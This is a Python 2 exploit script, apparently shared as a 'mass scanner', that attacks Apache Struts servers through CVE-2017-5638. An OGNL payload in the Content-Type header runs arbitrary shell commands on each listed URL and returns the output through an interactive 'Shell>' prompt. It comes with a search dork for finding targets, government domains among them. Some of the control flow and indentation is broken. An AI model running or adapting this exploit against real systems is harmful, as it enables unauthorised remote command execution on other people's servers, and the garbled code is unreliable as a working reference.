Apache Struts (CVE-2017-5638) RCE Mass Scanner

1. #!/usr/bin/python
2. # Modded Apache Struts2 RCE Exploit CVE-2017-5638 | By; LiGhT
3. # Dork: "site:com filetype:action"
4. # site example^: org,net,egu,gov,io,pw
5.  
6. import urllib2
7. import httplib
8. import sys, re, os
9.  
10. strutz = open(sys.argv[1], "r").readlines()
11.  
12. def exploit(url, cmd):
13.     page = ''
14.     payload = "%{(#_='multipart/form-data')."
15.     payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
16.     payload += "(#_memberAccess?"
17.     payload += "(#_memberAccess=#dm):"
18.     payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
19.     payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
20.     payload += "(#ognlUtil.getExcludedPackageNames().clear())."
21.     payload += "(#ognlUtil.getExcludedClasses().clear())."
22.     payload += "(#context.setMemberAccess(#dm))))."
23.     payload += "(#cmd='%s')." % cmd
24.     payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
25.     payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
26.     payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
27.     payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
28.     payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
29.     payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
30.     payload += "(#ros.flush())}"
31.  
32.     # cmd can be exit if you wanna quit the session
33.     try:
34.     if cmd.lower() == "exit":
35.         pass
36.     else:
37.         url = ''.join(url)
38.         if "http://" not in url:
39.             url = "http://"+url
40.         elif "https://" in url:
41.             url = url.replace("https://", "http://")
42.         else:
43.             pass
44.             headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
45.             request = urllib2.Request(url, headers=headers)
46.             page = urllib2.urlopen(request).read()
47.     except httplib.IncompleteRead, e:
48.         pass
49.     except KeyboardInterrupt:
50.     print
51.         pass
52.     except Exception:
53.         pass
54.     print "\033[35m%s"%(page)
55.  
56.  
57. for url in strutz:
58.     try:
59.         cmd = raw_input("\033[32mShell\033[37m> ")     
60.         exploit(url, cmd)
61.     except KeyboardInterrupt:
62.         print
63.         pass
64.     except Exception:
65.         pass